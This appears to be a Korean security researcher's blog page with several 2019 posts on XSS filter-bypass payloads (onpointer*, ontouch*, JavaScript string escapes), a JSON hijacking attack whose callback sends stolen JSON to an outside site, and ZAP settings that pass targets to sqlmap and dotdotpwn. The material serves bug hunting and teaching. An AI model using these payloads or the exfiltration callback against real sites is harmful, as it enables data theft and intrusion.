7/31/2019

onpoint* XSS Payload for bypass blacklist base event-handler xss filter

Hi hackers.
I crafted XSS payloads for bypass event handler protection. it is just simple code.

onpoint* is an event handler for pointing devices (such as tablets). It has actions similar to onmouse*, and it can be used for XSS protection bypass.


onpoint* 로 시작하는 이벤트 핸들러가 있는데, 동작 방식이 onmouse*와 비슷하며 테스트 하다보니 이를 이용해서 XSS가 가능하여 블로그 글로 작성해봅니다. (TLDR만 봐도 무방..)


<div onpointerover="alert(45)">this is onpointerover=alert(45)</div>


TL;DR (XSS Payloads)

<div onpointerover="alert(45)">hahwul(45)</div>
<div onpointerdown="alert(45)">hahwul(45)</div>
<div onpointerenter="alert(45)">hahwul(45)</div>
<div onpointerleave="alert(45)">hahwul(45)</div>
<div onpointermove="alert(45)">hahwul(45)</div>
<div onpointerout="alert(45)">hahwul(45)</div>
<div onpointerup="alert(45)">hahwul(45)</div>

What is onpointer* ?

onpointer* is event handler for pointing devices.
details on https://www.w3.org/TR/pointerevents/

원래는 마우스 같은 포인팅 도구를 위한 핸들러로 알고있습니다(요게 조금 애매하긴한데..)
아무튼 사실상 포인팅 도구 또한 마우스와 어느정도 동일하다고 볼 수 있어서 트리거 하는 방식은 거의 비슷합니다. 포인터가 위에있을 때, 지나갔을 때, 움직였을 때 등등 이런 포인팅 이벤트가 발생했을 때 받아줄 수 있는 핸들러에요. 자세한 내용은 위에 링크 참고해주세요.

Event Handler of pointer
* onpointercancel
* onpointerdown
* onpointerenter
* onpointerleave
* onpointermove
* onpointerout
* onpointerover
* onpointerup
* gotpointercapture 
* lostpointercapture

onpoint* testing for xss

onpointerover
=> run mouseover

onpointerdown
=> run click

onpointerenter
=> run mouseover

onpointerleave
=> run mouseleave

onpointermove
=> run mouseleave

onpointerout
=> run mouseover

onpointerup
=> run mouseover

Valid Payload..
<div onpointerover="alert(45)">hahwul(45)</div>
<div onpointerdown="alert(45)">hahwul(45)</div>
<div onpointerenter="alert(45)">hahwul(45)</div>
<div onpointerleave="alert(45)">hahwul(45)</div>
<div onpointermove="alert(45)">hahwul(45)</div>
<div onpointerout="alert(45)">hahwul(45)</div>
<div onpointerup="alert(45)">hahwul(45)</div>


https://media.giphy.com/media/xSM46ernAUN3y/giphy.gif

Other cheatsheets

OWASP
* onAfterPrint() (activates after user prints or previews print job)
* onAfterUpdate() (activates on data object after updating data in the source object)
* onBeforeActivate() (fires before the object is set as the active element)
* onBeforeCopy() (attacker executes the attack string right before a selection is copied to the clipboard - attackers can do this with the execCommand("Copy") function)
* onBeforeCut() (attacker executes the attack string right before a selection is cut)
* onBeforeDeactivate() (fires right after the activeElement is changed from the current object)
* onBeforeEditFocus() (Fires before an object contained in an editable element enters a UI-activated state or when an editable container object is control selected)
* onBeforePaste() (user needs to be tricked into pasting or be forced into it using the execCommand("Paste") function)
* onBeforePrint() (user would need to be tricked into printing or attacker could use the print() or execCommand("Print") function).
* onBeforeUnload() (user would need to be tricked into closing the browser - attacker cannot unload windows unless it was spawned from the parent)
* onBeforeUpdate() (activates on data object before updating data in the source object)

Payload all the things
<object onafterscriptexecute=confirm(0)>
<object onbeforescriptexecute=confirm(0)>

Conclusion

Blacklist filtering based on the this(owasp,payloadallthethings) document can be bypassed because OWASP, Payload all the things, does not have this content.

Since HTML5, there are really many different event handlers and tags. A lot of testing is needed.

It’s a simple trick, but hope it helps!
happy bug hunting and security engineering.

byebye!
https://media.giphy.com/media/3orif7N2qBUUJ2hUK4/giphy.gif


Reference

https://www.w3.org/TR/pointerevents/
Share: | Coffee Me:

7/28/2019

JSON Hijacking with <script/src>

Hi hackers. It’s a long time I didn’t write blog post.
I found JSON Hijacking a not SOP case. I'm going to briefly explain it.
오랜만에 SOP우회가 아닌 JSON Hijacking 발견해서 간략하게 내용 풀어봅니다.

This is not a new technique. It's a very old traditional technique. These days, it's hard to get case because to many use Ajax-based(CORS) JSON.
[ plz don't make the wrong retweets :( ]
물론 이건 새로운 기술은 아니네요. 걍 좀 오래된거긴한데, 아무래도 최근 JSON 처리 방식으로 트렌드로 인해서 접하기 어려워진 부분은 확실합니다.


Vulnerable web service

Usually, many web servers request and process data based on JSON. Of course, local applications are on the same page.
보통 많은 웹 서버들이 JSON을 기반으로 데이터를 요청하고 처리합니다. 물론 로컬의 어플리케이션들도 비슷한 추세입니다.

There is a wide variety of data that is handled with JSON From the values for rendering web pages, to the logs, to the user’s personal data, to important data, it’s used in a lot of places.
JSON으로 처리되는 데이터는 굉장히 다양합니다. 웹 페이지 렌더링을 위한 값들부터, 로그, 사용자 개인 데이터, 중요한 데이터까지 정말 많은 곳에서 사용되고 있죠

Ajax call, Jquery $, xmlhttprequest, etc…, which can handle JSON requests, are affected by SOP, so data transfer is not possible except for the same domain. To this end, white list is specified by CORS header. So a lot of JSON Hijacking starts with the wrong settings of CORS.
대체로 JSON 요청을 처리할 수 있는 Ajax call, Jquery get, XMLhttprequest 등은 SOP의 영향을 받고 있기 때문에 동일 도메인 이외에는 데이터 전달이 불가능하고, 이를 위해 CORS 헤더로 white list를 명시해주어 사용합니다. 그래서 많은 JSON Hijacking이 CORS의 잘못된 설정으로 부터 시작하는 경우가 많습니다. 또는 동일 도메인에서의 XSS와 체인 어택으로 하는 분들이 있긴 합니다.. 뭐 이건 중요한게 아니니

I’ve arranged some information about SOP and JSON Hijacking before, so please refer to the links below.
SOP와 JSON Hijacking에 대한 내용은 예전에 정리해둔게 있으니 아래 링크 참고해주세요.

https://www.hahwul.com/2016/12/web-hacking-sopsame-origin-policy-web.html

Vulnerable web service

대략 이런 기능을 하는 페이지가 있었습니다.

[ Request ]
GET /getData?callback=abcd HTTP/1.1
Referer: www.hahwul.com

[ Response ]
200 OK
abcd({"name":"data~~"})

This is a function that return important values when a data is requested, of course there was no CORS setting and no normal JSON Hijacking is possible.
어떤 데이터를 요청하면 그에 따른 중요한 값을 넘겨주는 기능인데, 당연히 CORS 설정은 없었고 일반적인 JSON Hijacking은 불가능합니다.

As you can see in the request above, you can specify a callback, which is exposed in response. This is also a point for RXSS, but it has no direct impact because the application type is json.
위에 요청을 보면 아시겠지만, callback을 지정해줄 수 있고 이는 response에서 노출됩니다. 이 또한 RXSS의 포인트이긴하나, application type이 json이기 때문에 직접적인 영향은 없습니다.

It’s summarized into three.
정리하면 이렇습니다.
1) JSON Call for secret data
2) reflected callback
3) no check referer.. (my case.. bypass referer check logic)

JSON Hijacking with <script/src>

Can specify the required value for callback. This will be used as the value that is loaded into the script when invoked in the <script> tag.
우리는 callback에 필요한 값을 지정해줄 수 있습니다. 이는 <script> 태그 등에서 호출됬을 때 스크립트에 로드되는 값으로 사용하게 됩니다.

<script src="1.js">
</script>

<!-- 
//in 1.js 
alert(45)
-->

Run alert function on script/src domain.
이러면 script/src를 호출한 도메인에서 alert이 실행되죠.

When inserted into the payload below, sensitive information is read from the target domain and passed to the attacker site.
우리는 callback의 이름을 지정해 줄 수 있어 이런 형태의 페이로드로 전달해주면 공격자의 사이트로 넘겨줄 수 있습니다.

[ Attack code ]
<script src="target.domain.com/getData?callback=document.location.href='https://www.hahwul.com?'+JSON.stringify"></script>

<!-- 
 + JSON.stringify : JSON format to String
 + CSP 우회에도 비슷한 방식이 사용됩니다. 
-->

[ Response ]
document.location.href='https://www.hahwul.com?'+JSON.stringify({"name":"data~~"})

[ Next request on attacker site ]
GET /?{\"name\":\"data~~~~\"}
Host: www.hahwul.com
Share: | Coffee Me:

7/25/2019

Event handler for mobile used in XSS (ontouch*)

Some event handlers do not appear in the OWASP list.
It is a touch event like ontouch*. It is a limited item on mobile devices, so it has a less effective effect than general purpose, but it is a good item to trigger XSS.

(In fact, sometimes I forgot this event handler. so i take a note!)

<body ontouchstart=alert(45)> 
<body ontouchend=alert(45)>   
<body ontouchmove=alert(45)>  
<!-- 

[ ontouchstart ]
Triggers when a finger touch the screen

[ ontouchend ]
Triggers when a finger is removed from touch screen

[ ontouchmove ]
When a finger is dragged across the screen. 

-->


only mobile..., pc browser is not running code

Share: | Coffee Me:

HTTP Request(ZAP, Burp) Parsing on Ruby code (Method , Headers, etc...)

https://github.com/hahwul/XSpear/issues/10
XSpear 관련해서 이런 건의사항이 하나 있었습니다. Burp, ZAP 등에서 사용하는 패킷 데이터를 파일로 저장한 후 옵션을 주어 읽으면 자동으로 URL, Header 등을 파싱해서 사용하는 형태를 말씀하신 것 같습니다.(마치 sqlmap의 그것 처럼)

간단하게 처리를 위한 로직 작성해서 블로그 글로 남겨둡니다. (만두라이브러리 만들 때 생각했던거긴 한데 막상 구현해보니 엄청 간단했네요)

실제로 XSpear에 적용하기까진 각종 방어코드도 들어갈 것 같기 떄문에.. 오늘은 어렵겠네요.


Algorithm

1) 개행문자 단위로 잘라냄
2) 맨 첫줄은 메소드와 URL가 담김
 + 첫줄에선 공백으로 한번 더 잘라서 메소드, Path, HTTP/1.1로 구별
3) 다음줄부터 헤더 영역으로 ': ' 단위로 잘라냄
4) 잘라낸 데이터의 맨 앞은 헤더이름, 뒤엔 헤더 값이 됨
5) 헤더 값 중 ': ' 이 포함될 수 있으니 처음 잘린 값만 인지

in the Code

Code!
r = "GET https://www.hahwul.com/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3
Connection: keep-alive
Cookie: _ga=GA1.2.1102548207.1555467144; _gid=GA1.2.1362788908.1563875038
Upgrade-Insecure-Requests: 1
Host: www.hahwul.com"

method = ""
path = ""
headers = {}
switch = true

r.each_line do |line|
  if switch
    temp = line.split(" ")
    method = temp[0]
    path = temp[1]
    switch = false
  else
    temp = line.split(": ")
    hn = temp[0]
    hd = line.sub(hn+": ", "")
    headers[hn] = hd
  end
end

# Burp or ZAP
# http, https로 시작하면 zap 아니면 burp 포맷
url = 0 != (path.index('http://').to_i | path.index('https://').to_i) ? path : headers['Host']+path

puts "URL: "+headers['Host']+path
puts "\n"
puts "Method: "+method
puts "\n"
puts "Path: "+path
puts "\n"
puts "Headers\n"+headers.to_s

Test!
$ ruby test.rb
URL: www.hahwul.comhttps://www.hahwul.com/

Method: GET

Path: https://www.hahwul.com/

Headers
{"User-Agent"=>"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0\n", "Accept"=>"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\n", "Accept-Language"=>"ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3\n", "Connection"=>"keep-alive\n", "Cookie"=>"_ga=GA1.2.1102548207.1555467144; _gid=GA1.2.1362788908.1563875038\n", "Upgrade-Insecure-Requests"=>"1\n", "Host"=>"www.hahwul.com"}
Share: | Coffee Me:

7/16/2019

Displaying cli base table at ruby application on terminal

I Simply write it (for note). It is easy to develop using terminal-table.

How to Install?

gem install terminal-table

on Code

You can set the header or size using options of the terminal-table object, and the data can be put into an Array list.

require 'terminal-table'


rows = []
rows << ['xss', 'on']
rows << ['sqli', 'on']
rows << ['code', 'on']


table = Terminal::Table.new
table.title = "Cheatsheet"
table.headings = ['type', 'state']
table.rows = rows
table.style = {:width => 40}


# > puts table
+-------------------+------------------+
|              Cheatsheet              |
+-------------------+------------------+
| type              | state            |
+-------------------+------------------+
| xss               | on               |
| sqli              | on               |
| code              | on               |
+-------------------+------------------+

I applied this to the tool I created.


Share: | Coffee Me:

7/08/2019

XSS payload for escaping the string in JavaScript

오늘 오후쯤 신기한 페이로드를 하나 찾아서 메모해뒀다가 글로 작성해봅니다.
자바스크립트 내부에 코드가 삽입되었지만 문자열을 탈출할 수 없을 때 사용할 수 있으며 이런 형태의 패턴이 들어가는 곳도 은근히 있을 것 같습니다.


XSS Payload

@_zulln이 최근에 신기한 XSS 페이로드를 하나 공개했습니다.
https://twitter.com/_zulln/status/1147188307484446725

<script>
  var test = "injection <!-- <script/";
</script>

<img src="</script><script>alert(origin)</script>">

눈으로 보기엔, test 변수에 injection <!-- <script/ 값만 들어갈 것 같지만, 실제로 동작 시 닫는 스크립트가(</script>) 무시되며 이를 이용해서 자바스크립트 내부에서 문자열 구간을 탈출하여 구문을 실행할 수 있습니다.

소스보기 하이라이팅도 저렇게 표기하네.. 신기



음.. 원리는 솔직히 모르겠습니다.

추측컨테, <!-- 로 인해서 뒤의 처리를 무시하려는 것 같은데, 정상적인 문법은 아닌지라 그냥 브라우저상의 처리 오류라고 보는게 어떨까 싶습니다. 물론… 크롬, 파폭 모두 트리거 되는걸 보아 근본적인 공통 문제가 있지 않나 싶네요..

Escape double quote(String) in Javascript

겸사겸사 자바스크립트 내부에서의 문자열 탈출 방법도 몇개 같이 써 봅니다.

1. with <!-- <script/
<script>
  var test = "injection <!-- <script/";
</script>

<img src="</script><script>alert(origin)</script>">

2. with </script>
<script>
  var test = "</script><svg/onload=alert(45)>"
</script>

3. with double quot and plus
<script>
  var test = ""+alert(45)+""
  // user input: "+alert(45)+"
</script>

4. with backslash
<script>
  var test = "\", test1="+alert(45)//input2"
  // Original: var test = "input1", test1="input2"
  // user input1: \
  // user input2: +alert(45)//
</script>
Share: | Coffee Me:

7/03/2019

ZAP Send to Any tools(My Applicaiton settings, Send to Burpsuite and Other tools)

Hi friends?! I shared the applications settings in ZAP yesterday(https://www.hahwul.com/2019/07/easy-security-testing-with-applications-bridge-in-zap.html).
I’m going to share some of the settings that I was writing separately today.

Let’s get started, my go-to settings :)


ZAP Send to Any tools

Send to burp scan(2.0)

Full Command: /usr/local/bin/curl
Parameters: -i -k 127.0.0.1:1337 -X POST -d '{"urls":["%url%"]}' -H 'Content-Type: application/json;'

Add scan burp
(https://www.hahwul.com/2018/09/burp-suite-rest-api-burp-2.0.html)
POST /scan HTTP/1.1
Host: 127.0.0.1:1337


{
  "urls":["https://www.hahwul.com"]
}

Send to SQLMap

SQLMAP(GET)
Full Command: /usr/local/bin/sqlmap
Parameters: --dbs --no-cast --random-agent -u %url% --cookie %cookie%

SQLMAP(POST)
Full Command: /usr/local/bin/sqlmap
Parameters: --dbs --no-cast --random-agent -u %url% --cookie=%cookie% --data=%postdata%

Send to A2SV

Full Command: /usr/local/bin/a2sv
Parameters: -t %host% -p %port%

Send to ddp(dotdotpwn)

Full Command: /Users/hahwul/HAHWUL/tool/dotdotpwn/dotdotpwn.pl
Parameters: -m http-url -h %host% -u %url% -k "root:"
e.g
https://127.0.0.1/lib/file_download.asp?FilePath=TRAVERSAL

Send to Arachni

arachni
Full Command: /usr/local/bin/arachni-cli
Parameters: --output-verbose --scope-include-subdomains %url%

arachni (only xss)
Full Command: /usr/local/bin/arachni-cli
Parameters: %url% --checks=xss*

Send to Arjun

GET
Full Command: python3 arjun.py
Parameters: -u %url% --get --headers "Cookie: %cookie%"

POST
Full Command: python3 arjun.py
Parameters: -u %url% --post --headers "Cookie: %cookie%"

My Private Setting?

Secret :P / https://media.giphy.com/media/akbme2WYZCNLW/giphy.gif

Share: | Coffee Me:

7/02/2019

Easy security testing with applications bridge in ZAP(with SQLMap, XSStrike, etc..)

ZAP has one interesting feature. It is a function that can use external applications. This makes it easier and more powerful for security testing to work with external tools.
(글 2개쓰기 귀찮아서 걍 같이 남깁니다. ZAP의 Application 기능을 이용하면 좀 더 쉽게 보안 테스팅을 할 수 있습니다.)

Today’s post is how to use the Apply bridge(?) in ZAP.
(별거 없습니다.. 그냥 외부 어플케이션 연동 기능이에요!)


Warm-up exercise(How to setting?)

Open Application Menu

First, enter the application settings page. There are two ways
(먼저 어플리케이션 설정 메뉴로 진입합니다. 아래 방법으로 접근 가능해요.)

- Options > Applications
- Context Menu(Right Click) > Run Applicationn > Configure Applications



You can easily call it from Context Menu by adding Application to ZAP!
(여기에 등록하면 컨텍스트메뉴(우클릭)에서 바로 앱을 호출할 수 있습니다.)

Set Application Info (with data pattern in zap)

Zap’s application not only runs apps, but it can parse HTTP Request/Response data such as History and Requester and use it as a factor value. If you use it well, you will be able to test faster.
(재미있는건 단순하게 어플리케이션만 실행하는게 아니라 인자값을 전달해줄 수 있습니다. 그래서 ZAP에서 테스트하던 데이터를 그대로 외부 앱에 전달해 줄 수 있죠.)

It’s a special character defined in the ZAP.
(이런 패턴이에요)

%url%
the full url, e.g. 'http://localhost/test?a=b' 

%site% 
the site, e.g. 'http://localhost:8080/' 

%host% 
the hostname, e.g. 'localhost' 

%port% 
the port, e.g. '80' 

%cookie% 
the first cookie field from the request header (if any) 

%postdata% 
the POST data sent, if any, with any newlines replaced with "\n" 

%msgid% 
the HTTP message id to fetch data from the API (/JSON/core/view/message/?id=$msgid), does not alway exist, will return -1 if no message id 

%header-{{ header }}% 
the request header by name (if any), e.g. %header-user-agent% would return the value of the User-Agent header

My sample data.. sqlmap
Full COmmand: /usr/local/bin/sqlmap
Working Dir: /usr/local/bin
Parameter: --dbs --no-cast --random-agent -u %url%




In addition to sqlmap, you can conveniently perform tasks such as XSStrike and dotdotpwn.

Run application on ZAP

Right click > Run Application > Your App!

[/usr/local/bin/sqlmap, --dbs, --no-cast, --random-agent, -u, https://www.hahwul.com]
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.3.3#stable}
|_ -| . [,]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 00:10:29 /2019-07-02/

[00:10:29] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.460.0 Safari/534.3' from file '/usr/local/Cellar/sqlmap/1.3.3/libexec/txt/user-agents.txt'
[00:10:29] [INFO] testing connection to the target URL
[00:10:32] [INFO] heuristics detected web page charset 'ISO-8859-2'
[00:10:33] [INFO] checking if the target is protected by some kind of WAF/IPS
[00:10:37] [INFO] testing if the target URL content is stable
[00:10:37] [INFO] target URL content is stable
[00:10:37] [CRITICAL] no parameter(s) found for testing in the provided data (e.g. GET parameter 'id' in 'www.site.com/index.php?id=1')

[*] ending @ 00:10:37 /2019-07-02/


Share: | Coffee Me: